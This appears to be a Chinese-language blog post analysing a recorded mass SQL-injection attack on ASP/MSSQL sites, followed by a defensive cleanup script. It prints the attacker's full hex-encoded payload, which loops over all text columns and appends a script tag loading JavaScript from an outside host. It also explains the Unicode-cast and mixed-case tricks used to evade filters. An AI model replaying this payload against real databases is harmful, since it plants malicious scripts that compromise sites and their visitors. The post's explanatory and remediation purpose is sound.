有一些程序,尤其是asp程序,对提交参数的验证不严格导致SQL注入漏洞的存在,通常情况下的过滤都会替换单引号 ['],因此很多注入方式就采用将SQL 语句进行Unicode编码(16进制)后再使用Cast还原,然后采用Exec(@SQL)这样动态方式执行,MSSQL里面很多输入参数是字符串类型的函数同时支持字符串的Unicode编码输入.如:
IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) ,跟 IS_SRVROLEMEMBER('systemadmin') 是等价的, 0x7300 是"s" 的unicode的16进制表示方式,而7900着对应"y"(双字节,字母的高位字节是0),采用这样的方式就可以避免使用单引号,也可以避免一些不严格的sql过滤.
下面是记录到的一次数据库挂马代码:
--===========================---
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--
--========================--
Cast函数返回的是一组SQL语句,这个组SQL脚本使用游标的方式将数据库中的每张表,每条记录的字段是文本类型加上一个<script srx='xxxx'></script>这样的脚本引用,另外关键字拼写时采用大小写混合的方式,目的还是为了躲避一些过滤, 因为说到asp语法大家都知道他是不区分大小写的,但是asp中的很多字符串处理函数其实是大小写敏感的,
如Instr(strv,"declare") ,默认情况下进行的是进行二进制比较(区分大小写)如果strv="DEcLaRE"就会被忽悠过去.
下面是清理被挂马数据库的一段脚本,SQL2005版的,SQL2000的需要调整下变量类型
DECLARE @TableName nvarchar(200), @ColumnName nvarchar(200) Declare @SQL nvarchar(1000) Set @SQL='' DECLARE C_cursor CURSOR FOR Select Table_Name,Column_Name From INFORMATION_SCHEMA.COLUMNS where (Data_Type='nvarchar' Or Data_Type='ntext' Or Data_Type='varchar' Or Data_type='text' ) OPEN C_cursor FETCH NEXT FROM C_cursor INTO @TableName, @ColumnName -- Check @@FETCH_STATUS to see if there are any more rows to fetch. WHILE @@FETCH_STATUS = 0 BEGIN -----------数据处理代码------ Set @SQL=' Update ' + @TableName +' Set ' + @ColumnName + ' = Replace( cast(' + @ColumnName +' as nvarchar(max)),''<script src=http://3b3.org/c-1111.js></script>'','''') ' Exec( @SQL) -------------------------------- FETCH NEXT FROM C_cursor INTO @TableName, @ColumnName End CLOSE C_cursor DEALLOCATE C_cursor